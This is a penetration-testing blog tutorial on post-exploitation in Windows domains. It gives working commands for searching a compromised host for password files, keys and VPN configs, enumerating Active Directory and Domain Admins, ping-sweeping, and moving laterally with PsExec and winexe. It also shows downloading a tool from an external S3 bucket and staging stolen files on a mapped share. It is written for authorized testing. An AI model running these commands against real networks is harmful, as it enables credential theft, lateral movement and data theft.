Using APT tactics and techniques in your pentests

 

APT tactics
APT tactics

I have a student that has been asking me about internal network penetration testing. As a result, I figured I’d write a blog post about APT tactics. I was trying to explain to him that there is so much more to it than just popping boxes. Breaking into a machine is easy. On the other hand, moving around a network and stealing data without getting caught is the real skill. You will probably want to use Tactics, Techniques, and Procedures (TTPs) employed by Advanced Persistent Threat (APT).

Mostly, when I do network penetration tests, I explain to the customer that there are four levels of post exploitation. Therefore, they need to choose what level they want me to use based on the goals of the test.
  • Level 1: Access – proving that you can gain access to hosts.
  • Level 2: Leveraged Access – showing that you can jump from initially compromised hosts and move further to other hosts in the network.

 

  • Level 3: Data Driven Access – going after the target organization’s intellectual property, trade secrets or financials

 

  • Level 4:  Long term command and control (C2) – staying persistent in the environment for a prolonged period and exfiltrating data out of the network.

 

Meanwhile, I’ll try to cover a few of things we pentester’s do on internal pentests to data mine the network.

Data Mining The Host

At this point, you just broke into a machine with a browser, PDF, or Java exploit. You are sitting at your meterpreter prompt. You can run a few meterpreter scripts like ‘winenum.rb’, ‘enum_domain_user’, file_collector.rb, int_doc_find.rb or similar scripts. Even so, I am going to try to walk you through doing this stuff without meterpreter scripts and from here on, you will better understand what those scripts are doing or write your own.

Meanwhile, let’s start by turning our meterpreter shell into a regular shell.

meterpreter> execute -c -H -f cmd -a “/k” -i

Picture1a

Next, let’s figure out which updates got installed on this computer with DISM? Windows 7/8 (note: DISM will return far more details than WMIC.):

c:\DISM /Online /Get-Packages

Picture9

or:

c:\WMIC QFE List

Picture010

ok, now that we have a regular command prompt, next, we will search the drive and sort the files by time accessed.

We can use this to find necessary files by typing:.

c:\dir C:\ /S /OD /TA

Picture1b

Alternatively, if you know the date that a particular file got created, you can search the drive and sort them by time created by typing:

c:\dir C:\ /S /OD /TC

Picture1c

Elsewhere, you can also do something similar by searching for files based on the modification date. You can search the drive and sort the files by time written by typing:

c:\dir C:\ /S /OD /TW

Picture1d

Further, here is a trick that I use a lot presently is to search the drive for files with business critical words in the file names. I type the following:

c:\dir c:\*bank* /s

Picture1e

 

Even more, c:\dir c:\*password* /s

Picture1f

Next, c:\dir c:\*pass* /s

Picture1g

Even more, c:\dir c:\*competitor* /s

Picture1h

Also, c:\dir c:\*finance* /s

Picture1i

This is another set of goodies for financial and risk related data.

c:\dir c:\*invoice* /s

c:\dir c:\*risk* /s

c:\dir c:\*assessment* /s

Further, these are good when you are looking for specific file types, for instace, (.key or .pem files for encryption keys and certificates, .vsd files for Visio network diagrams, .pcf files for VPN configuration files, .ica files for Citrix, and log files).

c:\dir c:\*.key* /s

c:\dir c:\*.vsd /s

c:\dir c:\*.pcf /s

c:\dir c:\*.ica /s

c:\dir c:\*.crt /s

c:\dir c:\*.log /s

Especially relevant, I look hard for .pcf and .ica files.

Anything that can give me legitimate access to the network. Besides, there is no better backdoor than authorized access.

As a matter of fact, I did have had a pentest where the customer had the password file with the name GeorgeBush.xlxs – (yes, every network has a password text file or spreadsheet). Evidently, a penetration tester before me found the password file when it was called passwords.Xlsx. Later, they renamed the file. However, one can search a drive for files with critical data by other means besides using their name. One can type:

c:\type c:\sysprep.inf

c:\type c:\sysprep\sysprep.xml

c:\findstr /I /N /S /P /C:password *

c:\findstr /I /N /S /P /C:secret *

c:\findstr /I /N /S /P /C:confidential *

c:\findstr /I /N /S /P /C:account *

c:\findstr /I /N /S /P /C:payroll *

c:\findstr /I /N /S /P /C:credit *

c:\findstr /I /N /S /P /C:record *

 

 

Active Directory Enumeration

In the meantime, you have pilfered the host you compromised. It’s time to spread your wings and look for new prey in the network. Next, we will move on to active directory enumeration. For this reason, I will write another blog post on lateral movement later.

Often, I like using the net view command in looking for other hosts in the network.

c:\net view

Picture1j

 

In addition, We can run net view /domain to acquire a list of domains and workgroups in the target environment.
c:\net view /domain

Picture1k
Next, let’s look for local users (Always check this. You’ll run into a network that uses local accounts for stuff every once in a while ). System administrators often make use of local users and groups sometimes. They employ them in system administration tasks as a means of restricting access to the domain. Strangely enough, this can be a good if done very carefully. On the other hand, it could be atrocious as it often forces the admin to do administrative tasks with the same local admin password throughout the entire environment.

c:\net user

Picture1l

At this point, let’s grab a list of users in the domain.

c:\net user /domain

Picture1m

For the same reason we checked for local users, it is necessary that we check for local groups as well.

c:\net localgroup

Picture1n

Next, c:\net localgroup /domain

Picture1o

 

Then, c:\net localgroup administrators

Picture1p

Now, it’s time to get serious. The next few commands are where I get the best info.

c:\net localgroup administrators /domain

Picture1q
Finding out the users in the domain is always handy. However, there is nothing like the next command.

c:\net group “Domain Users” /domain

Now, this is where you make your money. Usually, I like to look for users in the Domain Admins group. After compromising my first host, I spear phish any user I find in the Domain Admins group. That’s rather the fastest way to gain domain admin level access for me.

c:\net group “Domain Admins” /domain

Picture1r

net user “jima” /domain

Picture1s

OK, at this point, let’s start moving around the network.

No Nmap – no problem. If you have time (because this is REALLY slow), you can ping sweep the network via a batch file.

Meanwhile, more pingsweep.bat

echo @echo off > pingsweep.bat

echo for %%a in (1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106

107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186

187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254) do ping -n 2 -w 2000 %1.%%a >> pingsweep.bat

Picture1

Afterward, all you have to do is just type ‘pingsweep’ and then the first 3 octets of the target subnet.

pingsweep 10.10.30

Picture2

Elsewhere, if you need to generate a list of IP addresses you can use this quick for a loop.

for /L %i in (1,1,255) do @echo 10.10.30.%i >> ips.txt

more ips.txt

Picture3

further, let’s echo some domain names into a text file.

echo heat >> names.txt

echo jima >> names.txt

echo roge >> names.txt

echo patr >> names.txt

echo jami >> names.txt

echo bonn >> names.txt

echo rhon >> names.txt

echo sall >> names.txt

echo joyj >> names.txt

echo laur >> names.txt

echo sloa >> names.txt

echo Administrator >> names.txt

more names.txt

Picture4

Next, we can use a for loop to look for logged in users

for /f “tokens=1” %a in (‘net view ^| find “\\”‘) do @echo %a >> hosts.txt

Picture5

PsExec

Following you finding machines with logged in users that you have passwords or hashes for, you can further PSExec those machines. Nevertheless, I know I didn’t cover password stealing and hash dumping. However, I’ll do it in another blog post if you guys want me to.

PSExec in Windows

c:\psexec.exe /accepteula \\10.10.30.81 -u administrator -p P@ssw0rd4321! cmd.exe

PSExec in Linux


In the meantime, just for the sake of making sure that you have this syntax – here is how to do PSExec in Linux. I prefer to use a tool called winexe. Besides, I have it on my Amazon S3 if you want to download it from me.

cd ~/toolz

wget https://s3.amazonaws.com/StrategicSec-Files/winexe

chmod 777 winexe

./winexe -U Administrator%P@ssw0rd4321! //WIN7-X64-1 cmd.exe

Picture6

 

Picture7

Here is how I figure out how many users are logged on/connected to a server?

NET SESSION | FIND /C “\\”

Finally, just move with psexec to the next machine and do the host data mining all over again (shampoo, lather, rinse, repeat). At the same time, do all of the dir commands again, and you do all of the findstr commands again. Grab all of the necessary files then map a drive to what you want to become your staging server. Next, copy all of the necessary files to that staging server. In conclusion, here is how to map a network drive.

net use O: \\10.10.30.89\c$  /u:administrator P@ssw0rd4321!

net use /d O:

Picture8

Whew, this was a long blog post. We covered a lot today, however, there is a lot we didn’t cover. We didn’t cover password stealing, hashdump, pass the hash, as well as data exfiltration.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Digital Hacker

Digital Hacker

StormSecurity

IT Security Research and Services

govolution

About assembler and stuff

Astr0baby's not so random thoughts _____ rand() % 100;

ψυχῆς ἰατρεῖον "Hospital of the soul"

Penetration Testing Academy

Education and Advice for Rookies

P.M.C.S.P. Blog

Articles about Physics, Math, Computer Security & Programming and more

%d bloggers like this: